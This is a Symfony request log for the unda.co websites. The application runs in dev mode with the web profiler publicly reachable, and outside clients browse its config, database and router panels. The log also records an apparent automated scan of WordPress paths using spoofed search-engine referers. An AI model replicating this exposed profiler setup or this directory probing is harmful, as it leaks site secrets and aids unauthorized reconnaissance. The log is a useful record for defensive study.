[2025-12-20 03:39:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 03:41:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 03:41:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=twig","method":"GET"} []
[2025-12-20 03:41:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 03:43:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17","method":"GET"} []
[2025-12-20 03:43:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 03:48:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d8ebc6","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/d8ebc6","method":"GET"} []
[2025-12-20 03:48:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 03:49:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 03:57:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=router","method":"GET"} []
[2025-12-20 03:57:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 03:57:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"5f0320","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/5f0320/router","method":"GET"} []
[2025-12-20 04:03:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 04:03:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 04:06:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d349d2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d349d2?panel=db","method":"GET"} []
[2025-12-20 04:06:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 04:11:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"88655c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/88655c/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-20 04:11:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-20 04:12:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=db","method":"GET"} []
[2025-12-20 04:12:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 04:14:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 04:18:41] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 04:21:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6ac002","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6ac002?panel=config","method":"GET"} []
[2025-12-20 04:21:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 04:22:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/images/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/images/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mini" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mini\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:23:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:26:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 04:28:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:35:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 04:35:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 04:47:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 04:50:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b8d5e3","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b8d5e3/search/results?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
